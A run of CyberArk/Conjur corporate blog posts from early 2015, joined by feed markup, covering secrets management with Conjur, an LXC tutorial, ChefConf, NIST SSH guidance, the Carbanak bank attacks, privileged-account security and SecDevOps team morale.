At one point I was sitting in on a call between the Conjur Sales Team and a smart, highly technical DevOps leader at a large travel site.

He was looking to use our system to improve the way his team was sharing secrets data. This guy really ‘got it’ and realized the value Conjur would bring to his continuous delivery pipeline.  Before he was ready to set up a POC in his own environment, however, he had one simple request…

Iwanttoseeitgo.Letmeseeit

This was a problem.

Conjur is part of a pipeline. It’s easy for us to spin up a Conjur virtual appliance but in order to really ‘see it go’ you need to have some kind of operations environment, sample code, the command-line tools, and a scenario to run through.

Here was an opportunity for User Experience Design to help solve a fundamental problem and support a key business goal. This had nothing to do with js animation, shiny ui controls, or any of the other visual design activities that are often mistaken for User Experience Design. This was about reducing time to value for new users in order to drive adoption.

Ideally, someone who is new to Conjur would be able to see the system ‘do something’ valuable from their own terminal window without having to set-up, download, or install anything.  At the time, there was no way to do this easily or on-demand.

Now there is.

Welcome to Conjur Demos!

Basically, you submit this form to get a fully provisioned cloud machine running the Conjur server, Conjur client, Docker, and Git. It comes pre-installed with sample code, and there is a detailed walk-through of a secrets management workflow.

The example workflow Secrets Management (Done Right) outlines a pretty typical DevOps scenario.

You have an application that requires access to a database server in order to run. Consequently, the application needs a database password to get the proper access. The instructions show how to store that secret securely, supply it temporarily to the application at run time, and audit the activity in detail.

We will be publishing more demo scenarios in the next few weeks including SSH Management Basics, Managing Access with Layers, and calling out to a demo appliance using stripped-down hardware and the REST API. At the moment there are no limits on how you use the demo environment, so if you have an idea for using Conjur to try your own innovative access management solution, fire up a demo and watch it go.

Of course, if you have anything to say about how the demo experience did or didn’t work for you, I would love to talk to you about it.

 

]]>
Chef cookbook uploads with Conjur https://www.cyberark.com/blog/chef-cookbook-uploads-with-conjur/ Thu, 26 Mar 2015 18:05:00 +0000 https://cyberarkvx2.wpengine.com/blog/chef-cookbook-uploads-with-conjur/  

In preparation for our workshop at ChefConf we created a new organization in Hosted Chef and uploaded some starter cookbooks. The best practice here is to create a specific user with permissions to only upload cookbooks. This ensures that the agent in your system responsible for uploading cookbooks cannot affect the rest of your Chef server. Conjur makes this very easy to do securely. Here are the steps:

I created a new user on Hosted Chef to be our trusted agent for deploys. In our case this is robot+deploy@conjur.net

I stored the user’s Chef private key that I downloaded from the Hosted Chef UI as a Conjur variable. The $pem variable here holds the private key content.


cat $pem | conjur variable create --as-group v4/ops hostedchef/conjurbot/private_key

Here’s the cool part. I created a mapping file for conjur env to supply the private key at run time.

.conjurenv


CLIENT_PEM: !tmp hostedchef/conjurbot/private_key

Now when we use conjur env run, the private key is pulled from Conjur, stored in a temporary file and CLIENT_PEM is an environment variable containing the path to that file.

I can now use that environment variable in knife.rb to provide authentication.

knife.rb


log_level :info
log_location STDOUT
node_name 'conjurbot'
client_key ENV['CLIENT_PEM']
chef_server_url 'https://api.opscode.com/organizations/chefconf15-conjur'

Now when I want to upload cookbooks I don’t have to hunt around for the private key or even have it on my system.


conjur env run -- knife cookbook upload .

Once the upload finishes, the private key is no longer on your system and access to the key is audited in Conjur. Here you can see I have permitted the build layer, which contains our Jenkins systems, to execute (read) the secret.

Screenshot2015-03-2613.46.50

In a production scenario you would give read permission on this key to only the parts of the infrastructure that need it – your CI/deploy system.

Check out `.conjurenv`, `knife.rb` and `deploy.sh` here: https://github.com/conjurdemos/chefconf15-base

 

]]>
Conjur 4.4 Released https://www.cyberark.com/blog/conjur-4-4-released/ Thu, 12 Mar 2015 13:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-4-4-released/  

On March 5th, 2015 we released Conjur 4.4!  This replaces version 4.3.2 from November 2014.  There are a number of improvements and added features.  Please read on for more details.

Top-level overview of new features:

  1. Improved security:  Stronger encryption and tamper-proofing of secrets at rest. Third-party cryptographic audit report is available on request.

  2. Support for secondary groups in Conjur LDAP:  Facilitates granular SSHaccess management via custom sudoers, as well as expanded possibilities for searching Conjur LDAP.

  3. Simplified and extended HA server management:  New “evoke” tool provides unified server configuration for Conjur HA management, including:

  • Configuration of a VM or bare metal server into different roles (as a standalone appliance, or any component of HA architecture)

  • Replication-based, no-downtime upgrade of HA deployments

  • Generation of seed files, which are used to establish trust and connection between various servers in HA setup.

  • Server backup and restore

  • Re-issue of SSL certificates with new altnames

  • Conjur Audit Server:  This new server capability provides export of audit records to external data stores such as Amazon RDS, ElasticSearch, Splunk, SumoLogic, etc.

  • Available as a Docker image

  • LDAP synchronization:  Conjur users and groups can be synchronized from an upstream LDAP or ActiveDirectory server.

  • Synchronization is one-way from the LDAP to Conjur.

  • Specific upstream groups can be selected for synchronization.

  • uid number and gid numbers are synchronized from the upstream system into Conjur.

  • Enables “blended” group management combining the external directory (e.g. ActiveDirectory) and native Conjur groups.

  • Audit improvements:

  • Better audit of forbidden actions

  • Support for audit limits to cap the storage needs of Conjur servers

  • New appliance platforms:

  • Conjur now is available as an LXC container. Lightweight, fast and easy to setup!

  • Conjur in VirtualBox is available for use as a development sandbox.

  • Permissions directory:  Full role graph data can be efficiently retrieved, with full support for permissions rules and visibility

If you’d like to see how these new features work in your own environment, please sign up for a free 30 day trial or contact us and we’ll answer any questions you may have.

 

]]>
The Access Control Gap in IaaS https://www.cyberark.com/blog/the-access-control-gap-in-iaas/ Wed, 11 Mar 2015 17:07:00 +0000 https://cyberarkvx2.wpengine.com/blog/the-access-control-gap-in-iaas/  

Agile control plane and system administration security is the missing link in enterprise IaaS.

It still seems like cloud adoption is driven by startups and non-sensitive data. Security and compliance concerns, along with inertia and turf-defense, are holding enterprises back from the cloud.

In this post, we posit that the remaining concerns that are holding sensitive workloads back from the cloud are rooted in the Systems Administration and Control Plane tiers. The nature of these systems is quite different from the traditional, on-premise data center.

Zero-trust systems, infrastructure as code, DevOps, and continuous delivery all present access control challenges that are not well-addressed by the last generation of access control and secrets management systems. Conjur exists to meet this need in a way that fits the needs and workflows of business, compliance, security, operations, and development.

Consider the basic elements of a typical IAAS-driven security stack:

At the top is the firewall, which may be a simple proxy server, or a more advanced piece of technology like a web application firewall. This is a pretty well understood problem; good solutions are available for both on-premise and IAAS.

Behind the firewall is the application tier, providing end user authentication and authorization via code that’s built into the app. It may also leverage some external providers like Active Directory or SAML. Most of the application-level security is built into the application code, which is the same whether it’s deployed on-premise or in IAAS. Extending the backend auth provider to the cloud has some challenges (especially for AD), but there are established companies today which provide LDAP services in cloud, including the Amazon Web Services Directory Service.

Whether on-premise or cloud, applications run on physical servers or virtual machines. Access to these machines is a back-door to all the application data and security controls. Therefore, the “gates” which control machine access, including secrets like database passwords as well as gatekeeper systems like SSH, are critically important for security purposes. The management of secrets in a cloud + DevOps environment is a problem without an established solution; Conjur provides robust, programmable secrets management that supports developer, ops, security, and combined (SecDevOps) workflows.

In IAAS systems, machines and other resources like queues and databases are increasingly managed not by human admins, but by trusted services running in a “control plane” that sits below the level of applications. For examples of control plane services think of Netflix Asgard auto-scaling and deployment service or configuration management tools like Chef, Puppet, Ansible, and SaltStack. In Continuous Delivery scenarios in which code is automatically packaged, tested, and deployed, the control plane even extends to systems like Jenkins and Github. Proper management of the control plane is a big challenge in the cloud. Conjur’s secrets management and LDAPS and HTTPS authorization APIs can be used very effectively in the control plane. For an example, see our now-classic blog post on Conjur and Jenkins.

Beneath the control plane sits the internal network. This network encompasses all of the VPNs, security groups, VPCs, subnets, NATs, routers etc that govern the flow of traffic in the system. IAAS has greatly expanded the possibilities for networking topologies however, best practices are still evolving.

Finally, beneath the network sits the physical infrastructure. Whether on-premise or IAAS, if you look far enough down the stack, everything is housed in a physical facility. The physical security of hosted IAAS systems is undeniably better than just about any on-premise facility. One could say that in IAAS, the physical security of data centers is a solved problem.

After looking at the areas described above, we at Conjur feel that the security aspects of Firewall, Application authn / authz, Networking, and Physical Infrastructure are well-understood and well-addressed in cloud. The next missing piece is access control for the cloud control plane that works with the cloud.

If you would like to find out more, please contact us.

]]>
What the NIST Guidelines for Secure Shell Mean for Your Organization https://www.cyberark.com/blog/nist-guidelines-secure-shell-mean-organization/ Thu, 05 Mar 2015 20:43:51 +0000 https://www.cyberark.com/blog//

The National Institute of Standards and Technology (NIST) recently issued guidelines for the use of Secure Shell (SSH) in automated access management. Frequently used by system administrators, SSH is a protocol used to enable secure access of privileged accounts to remote systems.

While the SSH protocol itself provides a secure communications channel, unmanaged SSH keys can introduce several vulnerabilities into an otherwise secure system. According to a recent report by the Ponemon Institute, the majority of organizations today are neither securing nor managing SSH keys. Worse, as a result, fifty-one percent of organizations surveyed in the report have already experienced an SSH key-related compromise.

NIST encourages organizations to start treating SSH keys like the privileged credentials they truly are by focusing on the following control areas:

  • Account Management – Proactively secure, manage and monitor the use of SSH keys.
  • Access Enforcement – Create and enforce approval policies for SSH key-based access to all enterprise systems, whether they are servers, virtual machines, operating systems, databases or applications.
  • Least Privilege – Limit privileges and access rights only to those required for a user’s role or function.
  • Auditing and Monitoring – Track the use of SSH keys, including who used the private key and what target system was accessed with that key.
  • Risk Assessment – Assess your environments, look for unnecessary relationships between systems and take steps to better segregate your environment.
  • Identity and Authentication – Ensure that each user has a unique SSH key and that the SSH key cannot be shared with other users, in order to easily identify who is doing what.

By following these guidelines organizations can bring SSH key security and management into their broader security plans, getting a head start on becoming compliant, mitigating the risk of unauthorized access to critical systems and better securing their sensitive data.

Read this CyberArk white paper to find out more about what the NIST guidelines for SSH mean for your organization and how CyberArk solutions can help organizations implement these security controls.

]]>
Getting started with LXC https://www.cyberark.com/blog/getting-started-with-lxc/ Thu, 05 Mar 2015 20:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/getting-started-with-lxc/  

LXC is a unified management toolkit that allows you to run multiple isolated instances of Linux (containers) on a single computer.

LXC is related to, but different than, virtualization engines like Xen and KVM. Unlike full-fledged virtual machines, LXC containers share one OS kernel. However, the processes that are running in one of the containers are completely isolated from processes running in another container. This isolation is achieved through the use of

 Linux kernel features such as:

  • cgroups provide for groups of processes limits, accounts for and isolates the resource usage, such as CPU, memory, disk I / O, network. LXC creates cgroup for each container, i.e. you can agile control every container independently.

  • namespaces provide insulation core namespaces (ipc, uts, mount, pid, network, user), making sure that each container cannot “see” or affect other containers. From user’s viewpoint it will look like init process in each container will have PID 1 and ifconfig command will show only a container’s network interfaces and etc.

  • capabilities provide fine-grained control over superuser permissions, allowing use of the root user for launching applications to be avoided.

  • Apparmor and SELinux expand the traditional Unix discretionary access control (DAC) model by mandatory access control (MAC) model, mainly used to protect your host system against the software running in containers. For example, it controls what devices will be accessible from a container or what kernel features will be accessible from it.

  • seccomp provides very low level a sandbox mechanism for applications, basically allows a process to make a one-way transition into a “secure” state where it cannot make any system calls except few about reading and writing to already opened files. In latests kernel it allow to select which syscall will be allowed.

It’s alright if you don’t know much about these kernel features. LXC provides a user-friendly way to take advantage of all of them, with sensible defaults, without sacrificing low-level control if you actually need it.

Another cousin of LXC is Docker. While Docker started as a layer on top of LXC, it’s now built on its own container engine called libcontainer. The good way to understand how Docker differs from LXC is to understand the concept of a 12 factor application. 12 factor applications are composed of disposable, stateless processes. And, it happens that this is exactly what Docker provides. A Docker container is designed to run a single process only, rather than a fully fledged machine like full virtualization or LXC. A Docker container must have fully externalized configuration (especially for secrets), and it’s also designed to share data with the host environment through linked volumes.

So, think of it this way. LXC containers are lightweight VM’s: you can install your OS, login, install applications and services and it will work as expected. It will have proper init process, running services and daemons and etc.

Intrigued? Let’s show how to get started.

Installation

In modern distributions, such as Ubuntu Trusty (14.04), Utopic (14.10) or later, Debian Jessie, delivered packages of stable LXC 1.x version. In these distros, you can install LXC directly from the repository and start using it. For OS X users: LXC, like Docker, will not run natively, since it uses technologies implemented only in the Linux kernel. So you have to use a full-weight virtual machine like VirtualBox to run LXC inside a modern Linux distribution. Of course, this is also an option for users of other platforms as well.

We use Ubuntu Trusty as our workstation and server operating system. It’s working great for us, so we recommend that you use it too!

Ubuntu

Trusty or Utopic users can just install packages from the repository:

$ sudo apt-get install lxc

If you are using older distributions or maybe you want to use a newer version of LXC on a fresh distro then you have the choice of two PPA:

Adding a PPA and installing packages from it is always simple:

$ sudo apt-get install -y python-software-properties
$ sudo add-apt-repository -y ppa:ubuntu-lxc/stable # or ppa:ubuntu-lxc/daily for those who have strong spirit
$ sudo apt-get update
$ sudo apt-get install -y lxc

Brctl program is in the bridge-utils package. debootstrap, rpm, yum, pacman are contained in the corresponding packages.

OS X

You can use VirtualBox (https://www.virtualbox.org/wiki/Downloads) to run Ubuntu Utopic (it’s free!). Just download the installation image from http://releases.ubuntu.com/14.04/ubuntu-14.04.1-server-amd64.iso and install it inside a VirtualBox virtual machine.

If you are a Vagrant user then just copy this listing to a new Vagrantfile and run in a terminal:

$ vagrant up

Listing: Vagrantfile

VAGRANTFILE_API_VERSION = "2"
Vagrant.configure(VAGRANTFILE_API_VERSION) do |config|
  config.vm.box = "utopic64"
  config.vm.box_url = "http://files.vagrantup.com/utopic64.box"
  config.vm.provision :shell, :inline => "apt-get update -qq && apt-get install -yqq lxc bridge-utils"
  config.vm.network :private_network, ip: "10.0.4.2"
  config.vm.network :public_network
end

A few minutes later, you can execute this command to get inside a fully configured system with installed LXC:

$ vagrant ssh

After installation

Running the program lxc-checkconfig, you can be sure that everything works as it should. In each case, the word “enabled” show be green:

$ sudo lxc-checkconfig 
Kernel configuration not found at /proc/config.gz; searching...
Kernel configuration found at /boot/config-3.19.0-031900rc6-generic

— Namespaces —

Namespaces: enabled

Utsname namespace: enabled

Ipc namespace: enabled

Pid namespace: enabled

User namespace: enabled

Network namespace: enabled

Multiple /dev/pts instances: enabled


— Control groups —

Cgroup: enabled

Cgroup clone_children flag: enabled

Cgroup device: enabled

Cgroup sched: enabled

Cgroup cpu account: enabled

Cgroup memory controller: enabled

Cgroup cpuset: enabled


— Misc —

Veth pair device: enabled

Macvlan: enabled

Vlan: enabled

File capabilities: enabled

Note : Before booting a new kernel, you can check its configuration

usage : CONFIG=/path/to/config /usr/bin/lxc-checkconfig

The same system will be a new network interface, which will incorporate all containers such as iron and the switch to release them to the Internet:

$ sudo ifconfig | grep lxc
lxcbr0    Link encap:Ethernet  HWaddr e2:0a:c8:95:d0:b3

Have questions about this?  Feel free to leave a comment below and I will respond in the thread.  Stay tuned for my next blog post that will further examine LXC and provide an example.

]]> 3 Insider Tips to Maximize Your ChefConf 2015 Experience https://www.cyberark.com/blog/3-insider-tips-to-maximize-your-chefconf-2015-experience/ Tue, 24 Feb 2015 16:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/3-insider-tips-to-maximize-your-chefconf-2015-experience/  

As we inch closer to March, our thoughts are starting to drift out of the snowbanks of Boston and float towards the much sunnier skies of Santa Clara where we will be attending ChefConf from March 31st to April 2nd.  For those not familiar with the event, it is put on by Chef who succinctly describes it as:

“The largest, most vibrant gathering of web-scale IT and DevOps leaders, practitioners, and innovators. Featuring three days of inspired discussions, collaborative presentations, technical training, and hands-on labs focused on automating infrastructure and the continuous delivery of applications.”

chefconf-2015As first time attendees (and sponsors) we wanted to learn how to maximize our week at the conference from a ChefConf veteran. Luckily, the folks at Chef were nice enough to put us in touch with Nathen HarveyChef Community Director, who was able to answer some of our questions.

If you are attending, or are thinking about attending, we are sure you’ll find Nathen’s answers helpful and we hope to see you there!

Q1) What will be the biggest difference between this year’s ChefConf and last year’s conference?

A1) The big difference will be the scale of the event. We’ve outgrown our previous location and we’re in the much bigger Santa Clara Convention Center. This will be the largest ChefConf in the history of Chef. We’ll have stalwarts of the Chef community, a large number of new and growing customers (Bloomberg, Workday, CenturyLink) are speaking this year, and many new customers as the Chef tent grows. Additionally, the Chef partner ecosystem is exploding as DevOps becomes more mainstream our technical partnerships like with Conjur bring customers more value out of their automation projects.

Q2) What are 1 or 2 sessions that you are most excited about this year and why?

A2) We have a really great slate of talks, but a couple of sessions I’m particularly excited about are both from first time speakers:

  • Christine Draper and John Sweitzer of Thirdwave Insights will speak in a session titled Serve meals, Not Ingredients in which they will share techniques for deployment topologies.

Q3) What advice would you give to someone attending ChefConf for the very first time this year?

A3) Come with an open mind and plan to get your hands dirty. ChefConf is not your typical technical conference. The Chef Community is welcoming and open-minded to all sorts of ideas, people, and approaches and as a first timer embrace and engage with other attendees. Networking and learning from other community members is highly encouraged!

Many thanks to Nathen for providing such great feedback.  If you are planning on attending ChefConf (seriously, why wouldn’t you at this point?) then we’d like to make sure you know that Kevin and Dustin from Conjur, along with a special guest speaker, will be presenting a half-day workshop on Building a Self-Documenting Application: A Study in Chef and Compliance.  If this is something that interests you, please stop by and say hello!

We look forward to seeing you next month at ChefConf!

 

]]>
Carbanak, Anunak and Unprotected Privileged Accounts https://www.cyberark.com/blog/carbanak-anunak-unprotected-privileged-accounts/ Mon, 23 Feb 2015 18:30:33 +0000 https://www.cyberark.com/blog//

The financial world and the security industry have been rocked by the recent report from Kaspersky about the cyber-criminals that have stolen more than $1 Billion from global banks through cyber attacks. The initial reports link the attacks to a multinational criminal group, and highlight the use of sophisticated malware, dubbed Carbanak.

The attackers used simple techniques like phishing to trick employees into infecting their endpoints with malware. Once installed, the attackers went after the administrators in order to gain access to the machines on which financial administrators operated. On these machines, the attackers studied employee behaviors, captured keystrokes and passwords, and mimicked the banking procedures to ultimately steal money through fraudulent transactions and cash discharges at ATMs.

If this sounds familiar, it’s because these attacks seem to be closely related and probably are the same as the attacks disclosed in a December 2014 report by Fox-IT and Group-IB. We blogged about the emergence of the group at the time, and how the group targeted and exploited privileged accounts to perpetrate their attacks.

Regardless of what the group or malware is called, the recent revelations of hundreds of millions of dollars in cybercrime targeting the financial industry shows that criminal enterprises are alive and well, and continue to cultivate new cyber capabilities.

Protecting against these threats requires a shift in our mindset about cyber security – protecting your organization starts with the understanding that if your network holds something of value for a targeted attacker, then you’re likely breached, right now, or have been breached recently. This understanding is based on the fact that motivated attackers will always find a way in past perimeter defenses, mainly because they have limitless attempts to try and break through, as well as them being able to test their attack tools against any existing perimeter defense.

Once inside, attackers immediately focus on hijacking and exploiting unprotected privileged accounts (such as those of systems administrators), enabling them to move laterally across the network, gain access to critical systems, operate on sensitive assets and exfiltrate stolen data.

According to CyberArk’s recently published Cyber Threat Report, over 80 percent of all serious security incidents included a compromise and misuse of privileged accounts at some point in the attack process.

If the Carbanak and Anunak attacks teach us anything, it’s that while cyber attackers may have different motives or end goals, their pathways are usually the same: commandeer privileged accounts, escalate privileges to gain access across the network and steal critical data and assets without detection. This privileged escalation cycle is something we see time and time again, and organizations need to be prepared to prevent it and mitigate the threat of targeted attacks.

By implementing the necessary tools and infrastructure to manage, continuously monitor and track privileged account activity, along with the analytics and intelligence to identify anomalous activity, organizations can protect themselves and enable a quick detection and response, making it possible to mitigate potential damage early in the attack cycle.

Learn more about privileged account exploits and read first-hand accounts from some of the world’s top cyber forensics and incident response professionals in our Cyber Threat Report.

]]>
Understanding Linux Security https://www.cyberark.com/blog/understanding-linux-security/ Fri, 20 Feb 2015 18:55:17 +0000 https://www.cyberark.com/blog//

Over the years, it has been interesting to watch the rise of Linux servers as the go-to operating system for organizations. They’re touted for their superior stability, security, hardware, affordable cost of ownership and more. A recent IDC report found that Linux server demand has continued to grow with increased cloud infrastructure deployments and that they now represent 28.5 percent of all server revenue.

But popularity aside, Linux servers are not without flaws and can still be compromised, and the complexities of Unix environments, including customization and integration of script-based operations, can make security problems even more challenging. One recent example of its susceptibility was the critical vulnerability found in glibc, the GNU C library, which allowed attackers to execute code, gain access to user permissions, and remotely gain control of Linux machines. While patched, the so called “GHOST” vulnerability raises the question of how organizations can prevent exploitation of similar Linux issues. Beyond the glibc vulnerability, we all remember the Shellshock bug that was uncovered late last year, which affected all UNIX-based operating systems and Apple’s OS X and is still a big issue for the Linux community.

So how can organizations implement the necessary precautions to ensure their Linux servers don’t become a pathway for attackers to compromise and exfiltrate critical data? One important step is to follow the least privilege principle, which gives users no more access than is necessary for them to do their jobs.

This also means granting privileges strictly for current needs – not future ones – and continuously reviewing existing privileges to revoke those that are no longer required. The biggest challenge organizations and IT managers face today with regards to their super-user and administrator accounts is understanding who is accessing business-critical systems and information, and when they are accessing them. And that’s not to mention ever-increasing compliance regulations, which require stringent control over privileged accounts to prevent exposure of sensitive information to unauthorized users.

CyberArk takes the burden off of your organization, allowing you to easily combat Linux security issues while effectively balancing security and compliance requirements with operational and end-user needs. CyberArk On-Demand Privileges Manager  allows for enterprise-ready, centralized management and enables you to control and monitor administrative rights on desktops and servers, protecting both Unix/Linux and Windows environments. With CyberArk On-Demand Privileges Manager, user access can be determined and run based on the role and task at hand, dramatically reducing the exploitation of privileged accounts and overall risk within an enterprise.

As Linux servers continue to be relied on as the OS for the enterprise, it’s important to implement a solution to protect against security issues that are bound to arise. To help do so, we encourage you to check out our white paper, The 10 Pains of Unix Security.  And to learn more about our On-Demand Privileges Manager solution or to speak with a security specialist, visit here.

]]>
SecDevOps: Can there be happiness in security work? https://www.cyberark.com/blog/secdevops-can-there-be-happiness-in-security-work/ Thu, 19 Feb 2015 14:07:00 +0000 https://cyberarkvx2.wpengine.com/blog/secdevops-can-there-be-happiness-in-security-work/  

Stress and burnout are a very real concern in the InfoSec community. We talk about it at conferences, on podcasts, on Twitter, and on our blogs. There are even support groups and projects dedicated to the burnout in the security industry. I won’t go into the many studies and statistics on the issue, they are readily available elsewhere. Rather, I’d like to talk about this problem as it relates to the SecDevOps movement, where we have security teams engaged with dev and ops teams, in some cases as an embedded asset on a cross-functional team.

Metrics matter, data-driven decisions are a key part of the DevOps movement, the M in CAMS. For a couple years now I’ve been collecting a ‘happiness’ data point during our sprint retrospectives. 1-5, how happy were you with how the past sprint has gone, how happy are you working here? This is a subjective and emotional metric, not tied to units of work produced or business goals. The team is cross-functional with sec/dev/ops all working together and the team score is an average of everyone’s individual score. Here’s the graph from 2014, sprints were 1 week long:

Pretty content, for the most part. There were two factors that made the team report as less happy: lots of security work in the sprint and unclear business requirements. The latter can have many causes: unclear market, poor communication, and so on. Let’s focus on the former – why does increased security work in a sprint make a team unhappy?

#1: Low incentives and rewards

Security is seen as a cost center in many organizations, something you have to write a check for to avoid a potential disaster. Often, security is built into a product just before launch. Deadlines are looming, corners are cut and it is hard to be certain when enough is enough. Security is seen as a liability, not a feature, and stakeholders are not invested in the progress of the work being done.

Let’s compare the reactions of stakeholders during end-of-sprint demos.

A new product feature

A new security feature

 

Security work is not usually visual; running through a series of CLI commands during a demo is not likely to inspire. I’m not saying we have to have a GUI for everything. But security work must be a first-class citizen. We have to reframe the conversation if we want others to participate.

#2: Security slows down development

There is a line between being thoughtful about security and being a drag on velocity. Without cross-functional collaboration this line is easy to cross without knowing it. As Ops is coming to be seen as a service by providing platforms and reliability, Security should also be viewed as a service. If developers are being blocked by waiting on credentials, if ops are being blocked by waiting on security topology changes – this is a broken service. Tools like conjur can help. Ultimately, though, our security processes need to be regularly evaluated by all teams affected by them. Not giving dev and ops a voice leads to them being less invested. Less investment means a broken process that is worked around.

#3. The blame culture

Someone hacked into our Postgres, who let this happen? Someone rotated an API key and our services went down, who is to blame? The root cause of security problems is too often seen a person and not a process. It is easier to point out the troublemaker than take a good look at our security process and see what went wrong. A dev puts the PostgreSQL password into their source code because no one has yet figured out how to run tests with credentials in CI. Ops doesn’t lock down the RabbitMQ management console because they’ve been waiting on passwords to be made available to them all sprint. These types of problems are the symptoms of broken processes. The results of a postmortem should be action items to improve how we work together, not a demotion or public shaming of an individual. Accountability is necessary but we do ourselves a disservice by focusing more on blaming than improving.

Taking the time to address these issues is more important when transitioning to SecDevOps, not less. Security, development and operations share pain points. The cultural and organizational issues that security has been struggling with are now out in the open and impacting other teams that they work with more closely. Working together to improve communication and workflows is key to the success to SecDevOps. Let’s put a priority on happiness.

]]>
NOTICE: Investigators Warn of Increase in Service Account Exploits https://www.cyberark.com/blog/notice-investigators-warn-increase-service-account-exploits/ Tue, 10 Feb 2015 19:27:18 +0000 https://www.cyberark.com/blog//

“Most companies expect service accounts to be used only internally, so they keep the default passwords…[but] many of our recent investigations have seen exploits in service accounts – probably in 80-90 percent of the cases.” – Christopher Novak, Verizon RISK Team, Verizon Enterprise Solutions

Our recent threat research report analyzes the forensic experiences of the world’s leading cyber threat investigators in remediating the most devastating breaches. The report identifies the commonalities across advanced attacks, enabling organizations to better understand their adversaries so they can build more effective defenses against the latest threats.

In our last blog post, we looked more in-depth at one of the six primary findings in the report, the fact that no industry is safe from attackers. Today, we’re looking at the increasing attacker sophistication related to service accounts.

To read the report for yourself, download it here for free.

Finding #6: Exploits of privileged accounts widen

Privileged accounts are found across the enterprise and are prevalent in even the most unassuming places. In fact, when securing your organization’s privileged accounts, it’s important to remember that privileged accounts ship with every piece of information technology, including servers, desktops, applications databases and network devices.

In the report, experts highlight that attackers increasingly are targeting service accounts. These accounts range from embedded devices in the Internet of Things, to multiple privileged identities used in Microsoft Active Directory to ensure redundant points of access. The increasing sophistication around targeting service accounts points to the fact that hackers are no longer simply aimed at exfiltrating data; their goal is to gain widespread control of entire IT infrastructures.

Christopher Novak of Verizon went on to say, “We’ve seen 25-30 attacks recently in which attackers used (publically available) default passwords… And because it’s presumed individuals aren’t using [these accounts], analysts dial down the sensitivity on alerts. Service accounts are out of sight, out of mind.”

What this means is that while you may have some level of privileged account activity monitoring and security, there is likely an entire portion of your IT infrastructure that remains unprotected and open to attack. Beyond that, if attackers get access to an unmanaged service account, they can more easily navigate throughout the network with low risk of discovery.

When it comes to monitoring, protecting and securing privileged accounts, organizations need to do their due diligence to identify every account that exists, as well as do regular sweeps of new accounts as IT networks continue to expand with the ever-growing list of non-traditional types of Internet-connected devices. The bottom line is: if you can’t account for all of the privileged credentials across your organization, then you can’t expect to be secure. To find out where to start solving your privileged account challenges, check out our best practices guide.

]]>
Infrastructure as Code – Don’t Let Security Slow You Down https://www.cyberark.com/blog/infrastructure-as-code-dont-let-security-slow-you-down/ Fri, 06 Feb 2015 16:49:00 +0000 https://cyberarkvx2.wpengine.com/blog/infrastructure-as-code-dont-let-security-slow-you-down/  

A particularly thorny problem many developers face when writing configuration management code is how to use different secrets to test against various parts of their infrastructure. For best results, obtaining secrets should be the same no matter which environment you are in: local, test, dev or prod.

Current approaches all have the same problem: they introduce confusion into how your organization handles security. Confusion slows your team down. Slowing your team down makes another team angry because they’re waiting on that update to the platform to deploy their new application. Others are frustrated that we’re all cutting corners with security. Breaking SecDevOps is easy, see?

Here are some of the more popular ways to approach using secrets during development:

1- Write the secrets into the code.

No one disputes that this is bad form, even if your code is in a private repository. There is no separation of duties, access is way over-privileged, and there is no audit of access (although there is audit of updates).

2- Write the secrets to local files ignored by source control.

Looks fine from a source control standpoint, but wait – how do I get the secrets to create this local file, are they stored somewhere for me to retrieve or just in someone’s head? How are secrets being made available to our different environments? What happens when they change, how do I know to get new secrets?

3- Export the secrets as environment variables on the dev machine.

Same problems as #2.

4- Use something like chef-vault or citadel to provide the secrets on converge.

Chef-vault uses a machine’s public keys to grant authorization to a public service. The mechanism for creating those keys, getting them on the machine and retiring them are left up to you. Instead of being to create a role-based mapping of nodes, you are stuck with passing a list of nodes. Also, now you can only use Chef.

Citadel tackles the problem by using AWS IAM groups. Once you grow your infrastructure to a non-trivial size you end up with a gnarly mess of CloudFormation templates. And unless you develop on an AWS machine, you can’t test locally very easily.

So to recap, the above solutions can be characterized as:

  • Give up on secrets management and just give them to everyone

  • Have a few individuals manage secrets and require devs to request them as needed

  • Force developers to manually manage and exchange the secrets using a non-defined process

  • Lock the system into a single technology (Chef or AWS); and still be without audit capabilities, or ability to support true dev/ci/production workflows.

Reducing confusion and friction to enable speed with security is one of our primary goals at Conjur. To that end, we provide tooling to make development with secrets easier.

Let’s walk through an example of using Conjur in a test-kitchen workflow, injecting secrets into our kitchen.yml at runtime. The code for this example is here: https://github.com/conjurdemos/conjur-kitchen. Follow the README to launch it on your machine.

We are converging the rabbitmq cookbook, injecting the management console’s username and password from Conjur. This is just a standard cookbook setup with one file of note, `.conjurenv`. This file maps secrets stored in Conjur to temporary environment variables or files and allows you to run them in local context. When we run `conjur env run` the variables are pulled from Conjur and exported to environment variables only until the command exits. In this case `RABBITMQ_USERNAME` and `RABBITMQ_PASSWORD` are made available. You can always check if you have access to these secrets by running `conjur env check`.

Now all we have to do is override the Chef attributes in our `kitchen.yml` to point to these environment variables and we are ready to converge. `conjur env run — kitchen converge` is the command. The instance converges correctly, the tests run and test-kitchen exits. If you now run `echo $RABBITMQ_USERNAME` you get nothing. That environment variable is gone as soon as test-kitchen exits. This part is important – no credentials are left on the developer machine. As a developer I don’t even need to know what the value of the secret is. When someone rotates this secret, it doesn’t hinder my workflow at all.

This test-kitchen demo is just one example of how Conjur can enhance your existing workflows without sacrificing speed for security. Any tool you use that can accept environment variables as input will work great with Conjur.

Read more about the conjur env command here: http://developer.conjur.net/reference/tools/conjurenv

]]>
DIY Secrets Management is Letting Everyone Down https://www.cyberark.com/blog/diy-secrets-management-is-letting-everyone-down/ Thu, 05 Feb 2015 22:02:00 +0000 https://cyberarkvx2.wpengine.com/blog/diy-secrets-management-is-letting-everyone-down/  

One of the first things I do every morning is read the NYTimes and the WSJ. I can’t help but notice that Cybersecurity and Cybercrime have become very common themes. However, despite all the front page news, there doesn’t seem to be much information that is actually newsworthy on the cybersecurity front. Today’s top story was the Anthem Healthcare breach.  

Kudos to Anthem for getting out in front of this story by making an announcement.  The details are still unfolding but clearly data was stolen from the systems, and assuming the data was encrypted according to HIPAA requirements, database encryption keys must have been stolen too if the data were to be useful to the thieves.

secrets-management-to-do

If we want to stop this from happening, IT organizations need to code their way out of the problem.  Automation and security policies as code is the way forward so that the standardization and reproducibility of secrets management permeates the organization consistently.  Why is code the answer?  It can be 1) inspected, 2) tracked, and 3) verified.  Everything else is duct tape and bailing wire.

But this is like any burndown or behavioral change — elimination of security debt around secrets management must begin with a step in the right direction.  Are you using a privileged password right now?

